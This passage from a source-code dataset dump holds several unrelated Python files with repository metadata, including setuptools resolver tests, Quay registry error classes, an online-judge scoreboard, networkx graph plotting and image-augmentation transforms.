self.assertEqual(result,url)
def test_decode(self):
result = decode_url(url)
self.assertEqual(result,decoded)
if __name__ == '__main__':
logger = logging.getLogger()
logger.level = logging.DEBUG
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
unittest.main()
| 42.962264
| 123
| 0.62231
| 363
| 0.15942
| 0
| 0
| 0
| 0
| 0
| 0
| 402
| 0.176548
|
422975ef7721aeaa44f60c6499ab2952315acfbe
| 262
|
py
|
Python
|
_test/registry/reg04.py
|
javacommons/commonthread
|
dff8b39d7c86729e4711b669bcec8eab6f146659
|
[
"Unlicense"
] | null | null | null |
_test/registry/reg04.py
|
javacommons/commonthread
|
dff8b39d7c86729e4711b669bcec8eab6f146659
|
[
"Unlicense"
] | null | null | null |
_test/registry/reg04.py
|
javacommons/commonthread
|
dff8b39d7c86729e4711b669bcec8eab6f146659
|
[
"Unlicense"
] | null | null | null |
# source http://itasuke.hatenablog.com/entry/2018/01/08/133510
import winreg
newkey = winreg.CreateKeyEx(winreg.HKEY_CURRENT_USER, r'Software\__javacommons__\abc')
newkey.Close()
winreg.DeleteKeyEx(winreg.HKEY_CURRENT_USER, r'Software\__javacommons__\abc')
| 43.666667
| 87
| 0.80916
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 125
| 0.477099
|
422a7283e956bcdda7358ae083a9c572a8121dd9
| 8,289
|
py
|
Python
|
setuptools-37.0.0/pkg_resources/tests/test_working_set.py
|
coderlongren/PreliminaryPython
|
b5c7a87e41842c57aabb660de1514cba19c8bd78
|
[
"MIT"
] | 1
|
2017-09-19T15:21:50.000Z
|
2017-09-19T15:21:50.000Z
|
setuptools-37.0.0/pkg_resources/tests/test_working_set.py
|
coderlongren/PreliminaryPython
|
b5c7a87e41842c57aabb660de1514cba19c8bd78
|
[
"MIT"
] | null | null | null |
setuptools-37.0.0/pkg_resources/tests/test_working_set.py
|
coderlongren/PreliminaryPython
|
b5c7a87e41842c57aabb660de1514cba19c8bd78
|
[
"MIT"
] | 4
|
2017-05-12T09:18:16.000Z
|
2020-08-27T03:26:16.000Z
|
import inspect
import re
import textwrap
import pytest
import pkg_resources
from .test_resources import Metadata
def strip_comments(s):
return '\n'.join(
l for l in s.split('\n')
if l.strip() and not l.strip().startswith('#')
)
def parse_distributions(s):
'''
Parse a series of distribution specs of the form:
{project_name}-{version}
[optional, indented requirements specification]
Example:
foo-0.2
bar-1.0
foo>=3.0
[feature]
baz
yield 2 distributions:
- project_name=foo, version=0.2
- project_name=bar, version=1.0, requires=['foo>=3.0', 'baz; extra=="feature"']
'''
s = s.strip()
for spec in re.split('\n(?=[^\s])', s):
if not spec:
continue
fields = spec.split('\n', 1)
assert 1 <= len(fields) <= 2
name, version = fields.pop(0).split('-')
if fields:
requires = textwrap.dedent(fields.pop(0))
metadata=Metadata(('requires.txt', requires))
else:
metadata = None
dist = pkg_resources.Distribution(project_name=name,
version=version,
metadata=metadata)
yield dist
class FakeInstaller(object):
def __init__(self, installable_dists):
self._installable_dists = installable_dists
def __call__(self, req):
return next(iter(filter(lambda dist: dist in req,
self._installable_dists)), None)
def parametrize_test_working_set_resolve(*test_list):
idlist = []
argvalues = []
for test in test_list:
(
name,
installed_dists,
installable_dists,
requirements,
expected1, expected2
) = [
strip_comments(s.lstrip()) for s in
textwrap.dedent(test).lstrip().split('\n\n', 5)
]
installed_dists = list(parse_distributions(installed_dists))
installable_dists = list(parse_distributions(installable_dists))
requirements = list(pkg_resources.parse_requirements(requirements))
for id_, replace_conflicting, expected in (
(name, False, expected1),
(name + '_replace_conflicting', True, expected2),
):
idlist.append(id_)
expected = strip_comments(expected.strip())
if re.match('\w+$', expected):
expected = getattr(pkg_resources, expected)
assert issubclass(expected, Exception)
else:
expected = list(parse_distributions(expected))
argvalues.append(pytest.param(installed_dists, installable_dists,
requirements, replace_conflicting,
expected))
return pytest.mark.parametrize('installed_dists,installable_dists,'
'requirements,replace_conflicting,'
'resolved_dists_or_exception',
argvalues, ids=idlist)
@parametrize_test_working_set_resolve(
'''
# id
noop
# installed
# installable
# wanted
# resolved
# resolved [replace conflicting]
''',
'''
# id
already_installed
# installed
foo-3.0
# installable
# wanted
foo>=2.1,!=3.1,<4
# resolved
foo-3.0
# resolved [replace conflicting]
foo-3.0
''',
'''
# id
installable_not_installed
# installed
# installable
foo-3.0
foo-4.0
# wanted
foo>=2.1,!=3.1,<4
# resolved
foo-3.0
# resolved [replace conflicting]
foo-3.0
''',
'''
# id
not_installable
# installed
# installable
# wanted
foo>=2.1,!=3.1,<4
# resolved
DistributionNotFound
# resolved [replace conflicting]
DistributionNotFound
''',
'''
# id
no_matching_version
# installed
# installable
foo-3.1
# wanted
foo>=2.1,!=3.1,<4
# resolved
DistributionNotFound
# resolved [replace conflicting]
DistributionNotFound
''',
'''
# id
installable_with_installed_conflict
# installed
foo-3.1
# installable
foo-3.5
# wanted
foo>=2.1,!=3.1,<4
# resolved
VersionConflict
# resolved [replace conflicting]
foo-3.5
''',
'''
# id
not_installable_with_installed_conflict
# installed
foo-3.1
# installable
# wanted
foo>=2.1,!=3.1,<4
# resolved
VersionConflict
# resolved [replace conflicting]
DistributionNotFound
''',
'''
# id
installed_with_installed_require
# installed
foo-3.9
baz-0.1
foo>=2.1,!=3.1,<4
# installable
# wanted
baz
# resolved
foo-3.9
baz-0.1
# resolved [replace conflicting]
foo-3.9
baz-0.1
''',
'''
# id
installed_with_conflicting_installed_require
# installed
foo-5
baz-0.1
foo>=2.1,!=3.1,<4
# installable
# wanted
baz
# resolved
VersionConflict
# resolved [replace conflicting]
DistributionNotFound
''',
'''
# id
installed_with_installable_conflicting_require
# installed
foo-5
baz-0.1
foo>=2.1,!=3.1,<4
# installable
foo-2.9
# wanted
baz
# resolved
VersionConflict
# resolved [replace conflicting]
baz-0.1
foo-2.9
''',
'''
# id
installed_with_installable_require
# installed
baz-0.1
foo>=2.1,!=3.1,<4
# installable
foo-3.9
# wanted
baz
# resolved
foo-3.9
baz-0.1
# resolved [replace conflicting]
foo-3.9
baz-0.1
''',
'''
# id
installable_with_installed_require
# installed
foo-3.9
# installable
baz-0.1
foo>=2.1,!=3.1,<4
# wanted
baz
# resolved
foo-3.9
baz-0.1
# resolved [replace conflicting]
foo-3.9
baz-0.1
''',
'''
# id
installable_with_installable_require
# installed
# installable
foo-3.9
baz-0.1
foo>=2.1,!=3.1,<4
# wanted
baz
# resolved
foo-3.9
baz-0.1
# resolved [replace conflicting]
foo-3.9
baz-0.1
''',
'''
# id
installable_with_conflicting_installable_require
# installed
foo-5
# installable
foo-2.9
baz-0.1
foo>=2.1,!=3.1,<4
# wanted
baz
# resolved
VersionConflict
# resolved [replace conflicting]
baz-0.1
foo-2.9
''',
'''
# id
conflicting_installables
# installed
# installable
foo-2.9
foo-5.0
# wanted
foo>=2.1,!=3.1,<4
foo>=4
# resolved
VersionConflict
# resolved [replace conflicting]
VersionConflict
''',
'''
# id
installables_with_conflicting_requires
# installed
# installable
foo-2.9
dep==1.0
baz-5.0
dep==2.0
dep-1.0
dep-2.0
# wanted
foo
baz
# resolved
VersionConflict
# resolved [replace conflicting]
VersionConflict
''',
'''
# id
installables_with_conflicting_nested_requires
# installed
# installable
foo-2.9
dep1
dep1-1.0
subdep<1.0
baz-5.0
dep2
dep2-1.0
subdep>1.0
subdep-0.9
subdep-1.1
# wanted
foo
baz
# resolved
VersionConflict
# resolved [replace conflicting]
VersionConflict
''',
)
def test_working_set_resolve(installed_dists, installable_dists, requirements,
replace_conflicting, resolved_dists_or_exception):
ws = pkg_resources.WorkingSet([])
list(map(ws.add, installed_dists))
resolve_call = lambda: ws.resolve(
requirements, installer=FakeInstaller(installable_dists),
replace_conflicting=replace_conflicting,
)
if inspect.isclass(resolved_dists_or_exception):
with pytest.raises(resolved_dists_or_exception):
resolve_call()
else:
assert sorted(resolve_call()) == sorted(resolved_dists_or_exception)
| 17.304802
| 87
| 0.55447
| 277
| 0.033418
| 1,037
| 0.125106
| 5,131
| 0.619013
| 0
| 0
| 4,937
| 0.595609
|
422abcc408966dc47c31fc1259795d32236b4832
| 629
|
py
|
Python
|
setup.py
|
Sigel1/yolo-tf2
|
a11c856e601c23220fc2afce7c93e9f8eb4fd339
|
[
"MIT"
] | null | null | null |
setup.py
|
Sigel1/yolo-tf2
|
a11c856e601c23220fc2afce7c93e9f8eb4fd339
|
[
"MIT"
] | null | null | null |
setup.py
|
Sigel1/yolo-tf2
|
a11c856e601c23220fc2afce7c93e9f8eb4fd339
|
[
"MIT"
] | null | null | null |
from setuptools import find_packages, setup
install_requires = [dep.strip() for dep in open('requirements.txt')]
setup(
name='yolo_tf2',
version='1.5',
packages=find_packages(),
url='https://github.com/schissmantics/yolo-tf2',
license='MIT',
author='schismantics',
author_email='schissmantics@outlook.com',
description='yolo(v3/v4) implementation in keras and tensorflow 2.5',
setup_requires=['numpy==1.19.5'],
install_requires=install_requires,
python_requires='>=3.7',
entry_points={
'console_scripts': [
'yolotf2=yolo_tf2.cli:execute',
],
},
)
| 27.347826
| 73
| 0.659777
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 247
| 0.392687
|
422b18d573ebb1cb612e410eb429acc8c41c02ef
| 224
|
py
|
Python
|
btc_tracker_engine/helper_functions.py
|
metalerk/4btc
|
ee9ec1a6fcea1b489bd8afa9c3a25c025e022cb0
|
[
"MIT"
] | null | null | null |
btc_tracker_engine/helper_functions.py
|
metalerk/4btc
|
ee9ec1a6fcea1b489bd8afa9c3a25c025e022cb0
|
[
"MIT"
] | null | null | null |
btc_tracker_engine/helper_functions.py
|
metalerk/4btc
|
ee9ec1a6fcea1b489bd8afa9c3a25c025e022cb0
|
[
"MIT"
] | null | null | null |
def rate_diff_percentage(previous_rate, current_rate, percentage=False):
diff_percentage = (current_rate - previous_rate) / previous_rate
if percentage:
return diff_percentage * 100
return diff_percentage
| 44.8
| 72
| 0.772321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
422b4572706867cc810fb195c7e12772e8a93c86
| 324
|
py
|
Python
|
nngeometry/object/__init__.py
|
amyami187/nngeometry
|
cb516da3f7a019e148f48ff3ef3bed0cdae0d184
|
[
"MIT"
] | 103
|
2020-03-19T08:47:29.000Z
|
2022-03-29T00:54:38.000Z
|
nngeometry/object/__init__.py
|
amyami187/nngeometry
|
cb516da3f7a019e148f48ff3ef3bed0cdae0d184
|
[
"MIT"
] | 29
|
2021-01-07T13:39:20.000Z
|
2022-03-29T14:52:21.000Z
|
nngeometry/object/__init__.py
|
amyami187/nngeometry
|
cb516da3f7a019e148f48ff3ef3bed0cdae0d184
|
[
"MIT"
] | 11
|
2020-11-09T01:07:12.000Z
|
2022-03-29T00:54:41.000Z
|
from .pspace import (PMatDense, PMatBlockDiag, PMatDiag,
PMatLowRank, PMatImplicit,
PMatKFAC, PMatEKFAC, PMatQuasiDiag)
from .vector import (PVector, FVector)
from .fspace import (FMatDense,)
from .map import (PushForwardDense, PushForwardImplicit,
PullBackDense)
| 40.5
| 56
| 0.66358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
422e18702f6c683f268a4b49395a514801fec437
| 834
|
py
|
Python
|
vkwave/bots/core/dispatching/dp/middleware/middleware.py
|
YorkDW/vkwave
|
86b0278f15f398217a8211007c44651b6145831b
|
[
"MIT"
] | null | null | null |
vkwave/bots/core/dispatching/dp/middleware/middleware.py
|
YorkDW/vkwave
|
86b0278f15f398217a8211007c44651b6145831b
|
[
"MIT"
] | null | null | null |
vkwave/bots/core/dispatching/dp/middleware/middleware.py
|
YorkDW/vkwave
|
86b0278f15f398217a8211007c44651b6145831b
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
from typing import List, NewType
from vkwave.bots.core.dispatching.events.base import BaseEvent
MiddlewareResult = NewType("MiddlewareResult", bool)
class BaseMiddleware(ABC):
@abstractmethod
async def pre_process_event(self, event: BaseEvent) -> MiddlewareResult:
...
class MiddlewareManager:
def __init__(self):
self.middlewares: List[BaseMiddleware] = []
def add_middleware(self, middleware: BaseMiddleware):
self.middlewares.append(middleware)
async def execute_pre_process_event(self, event: BaseEvent) -> MiddlewareResult:
for middleware in self.middlewares:
m_res = await middleware.pre_process_event(event)
if not m_res:
return MiddlewareResult(False)
return MiddlewareResult(True)
| 29.785714
| 84
| 0.715827
| 641
| 0.768585
| 0
| 0
| 104
| 0.1247
| 381
| 0.456835
| 18
| 0.021583
|
422e499271a923bf090aefdbe25c5651121859de
| 3,517
|
py
|
Python
|
plot_scripts/try_networkx.py
|
gabrielasuchopar/arch2vec
|
1fc47d2cc7d63832e0d6337b8482669366b4aef2
|
[
"Apache-2.0"
] | 35
|
2020-10-22T03:58:23.000Z
|
2022-03-21T12:55:35.000Z
|
plot_scripts/try_networkx.py
|
gabrielasuchopar/arch2vec
|
1fc47d2cc7d63832e0d6337b8482669366b4aef2
|
[
"Apache-2.0"
] | 1
|
2021-06-03T13:49:47.000Z
|
2021-06-06T02:02:11.000Z
|
plot_scripts/try_networkx.py
|
gabrielasuchopar/arch2vec
|
1fc47d2cc7d63832e0d6337b8482669366b4aef2
|
[
"Apache-2.0"
] | 9
|
2020-10-22T14:13:53.000Z
|
2022-03-21T08:06:12.000Z
|
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
def node_match(n1, n2):
if n1['op'] == n2['op']:
return True
else:
return False
def edge_match(e1, e2):
return True
def gen_graph(adj, ops):
G = nx.DiGraph()
for k, op in enumerate(ops):
G.add_node(k, op=op)
assert adj.shape[0] == adj.shape[1] == len(ops)
for row in range(len(ops)):
for col in range(row + 1, len(ops)):
if adj[row, col] > 0:
G.add_edge(row, col)
return G
def preprocess_adj_op(adj, op):
def counting_trailing_false(l):
count = 0
for TF in l[-1::-1]:
if TF:
break
else:
count += 1
return count
def transform_op(op):
idx2op = {0:'input', 1:'conv1x1-bn-relu', 2:'conv3x3-bn-relu', 3:'maxpool3x3', 4:'output'}
return [idx2op[idx] for idx in op.argmax(axis=1)]
adj = np.array(adj).astype(int)
op = np.array(op).astype(int)
assert op.shape[0] == adj.shape[0] == adj.shape[1]
# find all zero columns
adj_zero_col = counting_trailing_false(adj.any(axis=0))
# find all zero rows
adj_zero_row = counting_trailing_false(adj.any(axis=1))
# find all zero rows
op_zero_row = counting_trailing_false(op.any(axis=1))
assert adj_zero_col == op_zero_row == adj_zero_row - 1, 'Inconsistant result {}={}={}'.format(adj_zero_col, op_zero_row, adj_zero_row - 1)
N = op.shape[0] - adj_zero_col
adj = adj[:N, :N]
op = op[:N]
return adj, transform_op(op)
if __name__ == '__main__':
adj1 = np.array([[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
op1 = ['in', 'conv1x1', 'conv3x3', 'mp3x3', 'out']
adj2 = np.array([[0, 1, 1, 1, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
op2 = ['in', 'conv1x1', 'mp3x3', 'conv3x3', 'out']
adj3 = np.array([[0, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0]])
op3 = ['in', 'conv1x1', 'conv3x3', 'mp3x3', 'out','out2']
adj4 = np.array([[0, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]])
op4 = np.array([[1, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
adj4, op4 = preprocess_adj_op(adj4, op4)
G1 = gen_graph(adj1, op1)
G2 = gen_graph(adj2, op2)
G3 = gen_graph(adj3, op3)
G4 = gen_graph(adj4, op4)
plt.subplot(141)
nx.draw(G1, with_labels=True, font_weight='bold')
plt.subplot(142)
nx.draw(G2, with_labels=True, font_weight='bold')
plt.subplot(143)
nx.draw(G3, with_labels=True, font_weight='bold')
plt.subplot(144)
nx.draw(G4, with_labels=True, font_weight='bold')
nx.graph_edit_distance(G1,G2, node_match=node_match, edge_match=edge_match)
nx.graph_edit_distance(G2,G3, node_match=node_match, edge_match=edge_match)
| 30.582609
| 142
| 0.477396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 304
| 0.086437
|
422eaaa92344214317cacbe394deaa82d7096b9d
| 6,552
|
py
|
Python
|
endpoints/v2/errors.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 2,027
|
2019-11-12T18:05:48.000Z
|
2022-03-31T22:25:04.000Z
|
endpoints/v2/errors.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 496
|
2019-11-12T18:13:37.000Z
|
2022-03-31T10:43:45.000Z
|
endpoints/v2/errors.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 249
|
2019-11-12T18:02:27.000Z
|
2022-03-22T12:19:19.000Z
|
import bitmath
class V2RegistryException(Exception):
def __init__(
self,
error_code_str,
message,
detail,
http_status_code=400,
repository=None,
scopes=None,
is_read_only=False,
):
super(V2RegistryException, self).__init__(message)
self.http_status_code = http_status_code
self.repository = repository
self.scopes = scopes
self.is_read_only = is_read_only
self._error_code_str = error_code_str
self._detail = detail
def as_dict(self):
error_dict = {
"code": self._error_code_str,
"message": str(self),
"detail": self._detail if self._detail is not None else {},
}
if self.is_read_only:
error_dict["is_readonly"] = True
return error_dict
class BlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUnknown, self).__init__("BLOB_UNKNOWN", "blob unknown to registry", detail, 404)
class BlobUploadInvalid(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadInvalid, self).__init__(
"BLOB_UPLOAD_INVALID", "blob upload invalid", detail
)
class BlobUploadUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadUnknown, self).__init__(
"BLOB_UPLOAD_UNKNOWN", "blob upload unknown to registry", detail, 404
)
class DigestInvalid(V2RegistryException):
def __init__(self, detail=None):
super(DigestInvalid, self).__init__(
"DIGEST_INVALID", "provided digest did not match uploaded content", detail
)
class ManifestBlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestBlobUnknown, self).__init__(
"MANIFEST_BLOB_UNKNOWN", "manifest blob unknown to registry", detail
)
class ManifestInvalid(V2RegistryException):
def __init__(self, detail=None, http_status_code=400):
super(ManifestInvalid, self).__init__(
"MANIFEST_INVALID", "manifest invalid", detail, http_status_code
)
class ManifestUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnknown, self).__init__("MANIFEST_UNKNOWN", "manifest unknown", detail, 404)
class TagExpired(V2RegistryException):
def __init__(self, message=None, detail=None):
super(TagExpired, self).__init__("TAG_EXPIRED", message or "Tag has expired", detail, 404)
class ManifestUnverified(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnverified, self).__init__(
"MANIFEST_UNVERIFIED", "manifest failed signature verification", detail
)
class NameInvalid(V2RegistryException):
def __init__(self, detail=None, message=None):
super(NameInvalid, self).__init__(
"NAME_INVALID", message or "invalid repository name", detail
)
class NameUnknown(V2RegistryException):
def __init__(self, detail=None):
super(NameUnknown, self).__init__(
"NAME_UNKNOWN", "repository name not known to registry", detail, 404
)
class SizeInvalid(V2RegistryException):
def __init__(self, detail=None):
super(SizeInvalid, self).__init__(
"SIZE_INVALID", "provided length did not match content length", detail
)
class TagAlreadyExists(V2RegistryException):
def __init__(self, detail=None):
super(TagAlreadyExists, self).__init__(
"TAG_ALREADY_EXISTS", "tag was already pushed", detail, 409
)
class TagInvalid(V2RegistryException):
def __init__(self, detail=None):
super(TagInvalid, self).__init__("TAG_INVALID", "manifest tag did not match URI", detail)
class LayerTooLarge(V2RegistryException):
def __init__(self, uploaded=None, max_allowed=None):
detail = {}
message = "Uploaded blob is larger than allowed by this registry"
if uploaded is not None and max_allowed is not None:
detail = {
"reason": "%s is greater than maximum allowed size %s" % (uploaded, max_allowed),
"max_allowed": max_allowed,
"uploaded": uploaded,
}
up_str = bitmath.Byte(uploaded).best_prefix().format("{value:.2f} {unit}")
max_str = bitmath.Byte(max_allowed).best_prefix().format("{value:.2f} {unit}")
message = "Uploaded blob of %s is larger than %s allowed by this registry" % (
up_str,
max_str,
)
class Unauthorized(V2RegistryException):
def __init__(self, detail=None, repository=None, scopes=None):
super(Unauthorized, self).__init__(
"UNAUTHORIZED",
"access to the requested resource is not authorized",
detail,
401,
repository=repository,
scopes=scopes,
)
class Unsupported(V2RegistryException):
def __init__(self, detail=None, message=None):
super(Unsupported, self).__init__(
"UNSUPPORTED", message or "The operation is unsupported.", detail, 405
)
class InvalidLogin(V2RegistryException):
def __init__(self, message=None):
super(InvalidLogin, self).__init__(
"UNAUTHORIZED", message or "Specified credentials are invalid", {}, 401
)
class InvalidRequest(V2RegistryException):
def __init__(self, message=None):
super(InvalidRequest, self).__init__(
"INVALID_REQUEST", message or "Invalid request", {}, 400
)
class NamespaceDisabled(V2RegistryException):
def __init__(self, message=None):
message = message or "This namespace is disabled. Please contact your system administrator."
super(NamespaceDisabled, self).__init__("DENIED", message, {}, 405)
class BlobDownloadGeoBlocked(V2RegistryException):
def __init__(self, detail=None):
message = (
"The region from which you are pulling has been geo-ip blocked. "
+ "Please contact the namespace owner."
)
super(BlobDownloadGeoBlocked, self).__init__("DENIED", message, detail, 403)
class ReadOnlyMode(V2RegistryException):
def __init__(self, detail=None):
message = (
"System is currently read-only. Pulls will succeed but all write operations "
+ "are currently suspended."
)
super(ReadOnlyMode, self).__init__("DENIED", message, detail, 405, is_read_only=True)
| 32.435644
| 100
| 0.654609
| 6,468
| 0.987179
| 0
| 0
| 0
| 0
| 0
| 0
| 1,425
| 0.217491
|
422f10e008ebbf5692ddbc20cb4464f21ab48808
| 3,956
|
py
|
Python
|
scoreboard.py
|
TheLurkingCat/scoreboard
|
9c292fc8573e7bf8539cb20a813c2147ddd0c923
|
[
"MIT"
] | null | null | null |
scoreboard.py
|
TheLurkingCat/scoreboard
|
9c292fc8573e7bf8539cb20a813c2147ddd0c923
|
[
"MIT"
] | null | null | null |
scoreboard.py
|
TheLurkingCat/scoreboard
|
9c292fc8573e7bf8539cb20a813c2147ddd0c923
|
[
"MIT"
] | null | null | null |
'''
LICENSE: MIT license
This module can help us know about who can ask when
we have troubles in some buggy codes while solving problems.
'''
from asyncio import gather, get_event_loop
from pandas import DataFrame, set_option
from online_judge import Online_Judge
loop = get_event_loop()
set_option('display.max_colwidth', -1)
class Scoreboard:
'''Handles a dataframe to build up a scoreboard.
Attributes:
problems: (list) A list of problem id which we are tracking.
scoreboard: (Dataframe) A pandas.Dataframe that saves user attempts.
by student id.
online_judge: (Online_Judge) An FOJ api wrapper.
'''
def __init__(self, token, problems, problem_name):
self.problems = problems
self.problem_name = problem_name
self.online_judge = Online_Judge(token)
self.scoreboard = DataFrame()
def update(self):
'''Update scoreboard using web crawler.
Since api return a json message, we can use it to update scoreboard.
'''
tasks = []
async def crawl(problem_id):
return await loop.run_in_executor(None, self.online_judge.get_submission, problem_id)
for problem_id in self.problems:
task = loop.create_task(crawl(problem_id))
tasks.append(task)
temp = dict(
zip(self.problems, loop.run_until_complete(gather(*tasks))))
self.scoreboard = DataFrame.from_dict(temp)
self.scoreboard.index.name = 'Student_ID'
self.scoreboard['Total'] = self.scoreboard.applymap(
lambda x: x == x and x['verdict'] == 10).sum(axis=1)
self.scoreboard['Penalty'] = self.scoreboard.applymap(
lambda x: x['penalty'] if isinstance(x, dict) and x['verdict'] == 10 else 0).sum(axis=1)
self.scoreboard.sort_values(
by=['Total', 'Penalty', 'Student_ID'], inplace=True, ascending=[False, True, True])
def visualize(self):
'''
Make scoreboard table.
Returns:
(str) A html page to be rendered.
'''
def make_verdict_string(x):
verdict = {4: 'CE', 5: 'RE', 6: 'MLE',
7: 'TLE', 8: 'OLE', 9: 'WA', 10: 'AC'}
if x == x:
return '<span class="{}" title="Attempted: {}">{}</span>'.format("right" if x['verdict'] == 10 else "wrong", x['penalty'], verdict[x['verdict']])
else:
return '<span class="none" title="Not Attempt">N/A</span>'
css = """<style type="text/css">
html,body{
margin:0;
padding:0;
height:100%;
width:100%;
}
.row_heading {width:70px}
.wrong {background-color:red}
.right {background-color:green}
.none {background-color:gray}
span{
text-align:center;
display:block;
width:60px;
}
th, td{
text-align:center;
width:60px;
}
a{
text-decoration:none;
color:black;
}
</style>
"""
scoreboard = self.scoreboard.drop(columns=['Total', 'Penalty']).applymap(
make_verdict_string)
scoreboard.index.name = None
scoreboard.index = scoreboard.index.map(
'<a href="https://oj.nctu.me/groups/11/submissions/?name={0}" target="_blank">{0}</a>'.format)
scoreboard.rename(lambda x: '<a href="https://oj.nctu.me/problems/{1}/" target="_blank" <span title="{0}">{1}</span></a>'.format(self.problem_name[str(x)], x),
axis='columns', inplace=True)
return css + scoreboard.to_html(border=0, max_cols=None, max_rows=None, escape=False)
| 35.63964
| 167
| 0.548787
| 3,621
| 0.915319
| 0
| 0
| 0
| 0
| 126
| 0.03185
| 1,966
| 0.496967
|
422f98ebeb65b657f8b008da4345d8f0e09f42c7
| 10,406
|
py
|
Python
|
custom_transforms.py
|
zyxu1996/Efficient-Transformer
|
106347186d13e106e9129d25b72e2fd491c54452
|
[
"Apache-2.0"
] | 22
|
2021-10-13T05:10:15.000Z
|
2022-03-17T12:01:40.000Z
|
custom_transforms.py
|
zyXu1996/Efficient-Transformer
|
efd87d734d5835eccb5b624c5e7ca3a5a08f318b
|
[
"Apache-2.0"
] | null | null | null |
custom_transforms.py
|
zyXu1996/Efficient-Transformer
|
efd87d734d5835eccb5b624c5e7ca3a5a08f318b
|
[
"Apache-2.0"
] | 4
|
2021-11-08T10:30:23.000Z
|
2022-02-16T05:07:25.000Z
|
import torch
import random
import numpy as np
import cv2
import os
import torch.nn as nn
from torchvision import transforms
class RandomHorizontalFlip(object):
def __call__(self, sample):
image = sample['image']
label = sample['label']
if random.random() < 0.5:
image = cv2.flip(image, 1)
label = cv2.flip(label, 1)
return {'image': image, 'label': label}
class RandomVerticalFlip(object):
def __call__(self, sample):
image = sample['image']
label = sample['label']
if random.random() < 0.5:
image = cv2.flip(image, 0)
label = cv2.flip(label, 0)
return {'image': image, 'label': label}
class RandomScaleCrop(object):
def __init__(self, base_size=None, crop_size=None, fill=0):
"""shape [H, W]"""
if base_size is None:
base_size = [512, 512]
if crop_size is None:
crop_size = [512, 512]
self.base_size = np.array(base_size)
self.crop_size = np.array(crop_size)
self.fill = fill
def __call__(self, sample):
img = sample['image']
mask = sample['label']
# random scale (short edge)
short_size = random.choice([self.base_size * 0.5, self.base_size * 0.75, self.base_size,
self.base_size * 1.25, self.base_size * 1.5])
short_size = short_size.astype(np.int)
h, w = img.shape[0:2]
if h > w:
ow = short_size[1]
oh = int(1.0 * h * ow / w)
else:
oh = short_size[0]
ow = int(1.0 * w * oh / h)
#img = img.resize((ow, oh), Image.BILINEAR)
#mask = mask.resize((ow, oh), Image.NEAREST)
img = cv2.resize(img, (ow, oh), interpolation=cv2.INTER_LINEAR)
mask = cv2.resize(mask, (ow, oh), interpolation=cv2.INTER_NEAREST)
# pad crop
if short_size[0] < self.crop_size[0] or short_size[1] < self.crop_size[1]:
padh = self.crop_size[0] - oh if oh < self.crop_size[0] else 0
padw = self.crop_size[1] - ow if ow < self.crop_size[1] else 0
#img = ImageOps.expand(img, border=(0, 0, padw, padh), fill=0)
#mask = ImageOps.expand(mask, border=(0, 0, padw, padh), fill=self.fill)
img = cv2.copyMakeBorder(img, 0, padh, 0, padw, borderType=cv2.BORDER_DEFAULT)
mask = cv2.copyMakeBorder(mask, 0, padh, 0, padw, borderType=cv2.BORDER_DEFAULT)
# random crop crop_size
h, w = img.shape[0:2]
x1 = random.randint(0, w - self.crop_size[1])
y1 = random.randint(0, h - self.crop_size[0])
img = img[y1:y1+self.crop_size[0], x1:x1+self.crop_size[1], :]
mask = mask[y1:y1+self.crop_size[0], x1:x1+self.crop_size[1]]
return {'image': img, 'label': mask}
class ImageSplit(nn.Module):
def __init__(self, numbers=None):
super(ImageSplit, self).__init__()
"""numbers [H, W]
split from left to right, top to bottom"""
if numbers is None:
numbers = [2, 2]
self.num = numbers
def forward(self, x):
flag = None
if len(x.shape) == 3:
x = x.unsqueeze(dim=1)
flag = 1
b, c, h, w = x.shape
num_h, num_w = self.num[0], self.num[1]
assert h % num_h == 0 and w % num_w == 0
split_h, split_w = h // num_h, w // num_w
outputs = []
outputss = []
for i in range(b):
for h_i in range(num_h):
for w_i in range(num_w):
output = x[i][:, split_h * h_i: split_h * (h_i + 1),
split_w * w_i: split_w * (w_i + 1)].unsqueeze(dim=0)
outputs.append(output)
outputs = torch.cat(outputs, dim=0).unsqueeze(dim=0)
outputss.append(outputs)
outputs = []
outputss = torch.cat(outputss, dim=0).contiguous()
if flag is not None:
outputss = outputss.squeeze(dim=2)
return outputss
class ToTensor(object):
"""Convert ndarrays in sample to Tensors."""
def __init__(self, add_edge=True):
"""imagenet normalize"""
self.normalize = transforms.Normalize((.485, .456, .406), (.229, .224, .225))
self.add_edge = add_edge
def get_edge(self, img, edge_width=3):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (11, 11), 0)
